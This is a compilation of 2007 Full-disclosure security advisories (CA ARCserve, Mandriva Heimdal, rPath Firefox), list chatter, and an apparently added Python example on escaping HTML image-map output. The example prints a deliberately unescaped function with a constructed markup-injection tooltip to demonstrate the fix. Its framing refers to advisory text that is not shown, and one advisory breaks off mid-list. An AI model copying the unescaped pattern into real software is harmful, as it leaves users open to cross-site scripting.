Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

This advisory Copyright (C) 2007 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.
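The five image-map properties the advisory lists split into two kinds: free text (tool tip, and in practice the name) that must be escaped as an attribute value, and structured values (shape, coords, href) that are better validated against what they are allowed to be than escaped. The following is an added example of that treatment, written in Python to stay stand-alone; it is not JFreeChart's code (which is Java), and the class and function names are assumptions.

```python
"""Escaping and validation for HTML image-map output, as an added example of
the fix the advisory describes; not JFreeChart's code. Names are assumptions."""
import html
import re
from dataclasses import dataclass
from typing import Iterable, Tuple

ALLOWED_SHAPES = {"rect", "circle", "poly", "default"}
# A map name is an identifier token, never free text.
_MAP_NAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_.:-]*$")


@dataclass(frozen=True)
class ChartArea:
    shape: str
    coords: Tuple[int, ...]
    href: str
    tooltip: str


def attr(value: str) -> str:
    """Escape free text for use inside a double-quoted HTML attribute."""
    return html.escape(value, quote=True)


def safe_href(url: str) -> str:
    """Allow only http(s) or site-relative URLs, then escape for the attribute."""
    url = url.strip()
    if url.lower().startswith(("http://", "https://")) or url.startswith("/"):
        return attr(url)
    raise ValueError(f"href scheme not allowed: {url!r}")


def render_area(area: ChartArea) -> str:
    """One <area> element with every property escaped or validated."""
    if area.shape not in ALLOWED_SHAPES:
        raise ValueError(f"unknown shape: {area.shape!r}")
    if not area.coords or not all(type(c) is int for c in area.coords):
        raise ValueError("coords must be a non-empty tuple of integers")
    coords = ",".join(str(c) for c in area.coords)
    return (f'<area shape="{area.shape}" coords="{coords}" '
            f'href="{safe_href(area.href)}" title="{attr(area.tooltip)}" '
            f'alt="{attr(area.tooltip)}" />')


def render_image_map(name: str, areas: Iterable[ChartArea]) -> str:
    """The whole <map>; the name is restricted to a token rather than escaped."""
    if not _MAP_NAME_RE.match(name):
        raise ValueError(f"invalid map name: {name!r}")
    body = "\n".join(render_area(a) for a in areas)
    return f'<map name="{name}">\n{body}\n</map>'


def unescaped_area(area: ChartArea) -> str:
    """The weak pattern the advisory describes: values concatenated verbatim."""
    coords = ",".join(str(c) for c in area.coords)
    return (f'<area shape="{area.shape}" coords="{coords}" '
            f'href="{area.href}" title="{area.tooltip}" />')


if __name__ == "__main__":
    # Constructed tool-tip text that closes the attribute and adds markup.
    hostile = ChartArea("rect", (10, 20, 110, 60), "/detail?series=1",
                        'Q1 "sales" <b>bold</b>')
    print(unescaped_area(hostile))                # markup passes straight through
    print(render_image_map("chart1", [hostile]))  # markup is inert
```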
[Full-disclosure] [CAID 35724, 35725, 35726]: CA BrightStor ARCserve Backup Multiple Vulnerabilities
Title: [CAID 35724, 35725, 35726]: CA BrightStor ARCserve Backup Multiple Vulnerabilities

CA Vuln ID (CAID): 35724, 35725, 35726

CA Advisory Date: 2007-10-10
CA Advisory Updated: 2007-12-05

Reported By:
Anonymous researcher working with the iDefense VCP (CVE-2007-5325)
Dyon Balding of Secunia Research (CVE-2007-5326)
Cocoruder of Fortinet Security Research Team (CVE-2007-5327)
Tenable Network Security (CVE-2007-5328)
Pedram Amini of DV Labs (dvlabs.tippingpoint.com) (CVE-2007-5329)
Dyon Balding of Secunia Research (CVE-2007-5330)
eEye Digital Security (CVE-2007-5331)
shirkdog (CVE-2007-5332)

Impact: A remote attacker can cause a denial of service, execute arbitrary code, or take privileged action.

Summary: Multiple vulnerabilities exist in BrightStor ARCserve Backup that can allow a remote attacker to cause a denial of service, execute arbitrary code, or take privileged action. The first set of vulnerabilities, CVE-2007-5325, CVE-2007-5326, and CVE-2007-5327, occur due to insufficient bounds checking by multiple components. The second vulnerability, CVE-2007-5328, occurs due to privileged functions being available for use without proper authorization. The third set of vulnerabilities, CVE-2007-5329, CVE-2007-5330, CVE-2007-5331, and CVE-2007-5332, are due to a memory corruption occurring with the processing of RPC procedure arguments by multiple services. The vulnerabilities allow an attacker to cause a denial of service, or potentially to execute arbitrary code.

Note: Updated patches are available. The original patches did not fully address some issues. Special thanks to Dyon Balding of Secunia and to Fortinet for reporting issues with the original patches.

Mitigating Factors: None

Severity: CA has given these vulnerabilities a maximum risk rating of High.

Affected Products:
BrightStor ARCserve Backup r11.5
BrightStor ARCserve Backup r11.1
BrightStor ARCserve Backup r11 for Windows
BrightStor Enterprise Backup r10.5
BrightStor ARCserve Backup v9.01
CA Server Protection Suite r2
CA Business Protection Suite r2
CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2
CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2

Affected Platforms: Windows

Status and Recommendation:
CA has issued the following patches to address the vulnerabilities.
BrightStor ARCserve Backup r11.5 - QO92996
BrightStor ARCserve Backup r11.1 - QO92849
BrightStor ARCserve Backup r11.0 - Upgrade to 11.1 and apply the latest patches.
BrightStor Enterprise Backup r10.5 - Upgrade to 11.5 and apply the latest patches.
BrightStor ARCserve Backup v9.01 - QO92848
CA Protection Suites r2: QO92996

How to determine if you are affected:
1. Using Windows Explorer, locate the file "asdbapi.dll". By default, the file is located in the "C:\Program Files\CA\BrightStor ARCserve Backup" directory.
2. Right click on the file and select Properties.
3. Select the General tab.
4. If the file timestamp is earlier than indicated in the table below, the installation is vulnerable.

Version  File Name    Timestamp            File Size
11.5     asdbapi.dll  10/24/2007 08:43:08  1249354 bytes
11.1     asdbapi.dll  10/19/2007 17:56:00  856064 bytes
9.01     asdbapi.dll  10/19/2007 18:02:22  700416 bytes

* For Protection Suites r2, follow instructions for BrightStor ARCserve Backup r11.5.

Workaround: None

References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
BrightStor ARCserve Backup Security Notice
http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp
Solution Document Reference APARs: QO92996, QO92849, QO92848, QO92996
CA Security Response Blog posting:
New patches available to address CA BrightStor ARCserve Backup multiple vulnerabilities
http://community.ca.com/blogs/casecurityresponseblog/archive/2007/12/05.aspx
CA Vuln ID (CAID): 35724, 35725, 35726
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35724
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35725
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35726

Reported By:
Anonymous researcher working with the iDefense VCP (CVE-2007-5325)
http://labs.idefense.com/intelligence/vulnerabilities/
Dyon Balding of Secunia Research (CVE-2007-5326)
CA BrightStor ARCserve Backup RPC String Buffer Overflow
http://secunia.com/secunia_research/2007-49/advisory/
Cocoruder of Fortinet Security Research Team (CVE-2007-5327)
Advisory: Vulnerability Affecting CA BrightStor ARCServe BackUp
http://www.fortiguardcenter.com/advisory/FGA-2007-11.html
Tenable Network Security (CVE-2007-5328)
http://www.tenablesecurity.com/solutions/
http://www.zerodayinitiative.com/advisories/ZDI-07-069.html
Pedram Amini of DV Labs (dvlabs.tippingpoint.com) (CVE-2007-5329)
http://www.zerodayinitiative.com/advisories.html
Dyon Balding of Secunia Research (CVE-2007-5330)
CA BrightStor ARCserve
[Full-disclosure] [ MDKSA-2007:239 ] - Updated heimdal packages fix potential vulnerability
___
Mandriva Linux Security Advisory                         MDKSA-2007:239
http://www.mandriva.com/security/
___

Package : heimdal
Date: December 6, 2007
Affected: Corporate 4.0
___

Problem Description:

It was found that the gss_userok() function in Heimdal 0.7.2 did not allocate memory for the ticketfile pointer before calling free(), which could possibly allow remote attackers to have an unknown impact via an invalid username. It is uncertain whether or not this is exploitable; however, packages are being provided regardless.

The updated packages have been patched to correct these issues.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5939
___

Updated Packages:

Corporate 4.0
Corporate 4.0/X86_64
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.

You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com
___

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] rPSA-2007-0260-1 firefox
rPath Security Advisory: 2007-0260-1
Published: 2007-12-06
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
[EMAIL PROTECTED]:1/2.0.0.11-0.1-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1984

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5959
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5960
http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox2.0.0.11

Description:
Previous versions of the firefox package are vulnerable to several types of attacks, some of which are understood to allow compromised or malicious sites to run arbitrary code as the user running firefox.

http://wiki.rpath.com/Advisories:rPSA-2007-0260

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
[Full-disclosure] GOBBLE ALERT FOR PEOPLES !!
ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION

Gobble decided to make one quick post to sex up the Matasano gate scandal. The link for our blog is http://turkeychargen.blogspot.com/

PS - We do not condone the recent DDoS on their website ...
[Full-disclosure] Google / GMail bug, all accounts vulnerable
Proof of concept here...

http://www.kristian-hermansen.com

--
Kristian Erik Hermansen
"I have no special talent. I am only passionately curious."
Re: [Full-disclosure] TCP Port randomization paper
Strangely enough this stuff exists for more than 3 years ... Think GRSEC and more specifically Network stack randomization. Well of course bow to IETF for accepting this for draft ...

Fernando Gont wrote:
> Folks,
>
> We have published a revision of our port randomization paper. This is the first revision of the document since it was accepted as a working group item of the tsvwg working group of the IETF (Internet Engineering Task Force). Any feedback on the proposed/described algorithms will be welcome.
>
> The document is available at:
> http://www.ietf.org/internet-drafts/draft-ietf-tsvwg-port-randomization-00.txt
>
> Additionally, it is available in other fancy formats (PDF and HTML) at:
> http://www.gont.com.ar/drafts/port-randomization/index.html
>
> Thanks,
>
> --
> Fernando Gont
> e-mail: [EMAIL PROTECTED] || [EMAIL PROTECTED]
> PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1

- --
Regards
Vladimir Vitkov
www.hoster.bg

Marijuana will be legal some day, because the many law students who now smoke pot will someday become congressmen and legalize it in order to protect themselves. -- Lenny Bruce
Re: [Full-disclosure] b0b27a223b66678f24aec254366526d7910d0f38679f6478804c7480d2271ce9 [was: TCP Port randomization paper]
On Dec 6, 2007 11:15 PM, Vladimir Vitkov [EMAIL PROTECTED] wrote:
> ... Strangely enough this stuff exists for more than 3 years ... Think GRSEC and more specifically Network stack randomization. ...

and high throughput hardware entropy sources. (aka, /dev/urandom fun, seeding at boot, and /dev/random sucked dry)

[ok, true entropy is overkill for port/isn selection when a secure prng (yarrow?) will suffice. but if you've got 100M/bps[0] on tap, why not spray freely over ephemeral port numbers and initial sequences...]

best regards,

0. http://www.via.com.tw/en/initiatives/padlock/hardware.jsp
VIA PadLock Security Engine

(i'll leave the fun of coding a high throughput entropy daemon for /dev/random to the reader. unless you happen to have a copy of mtrngd laying around...)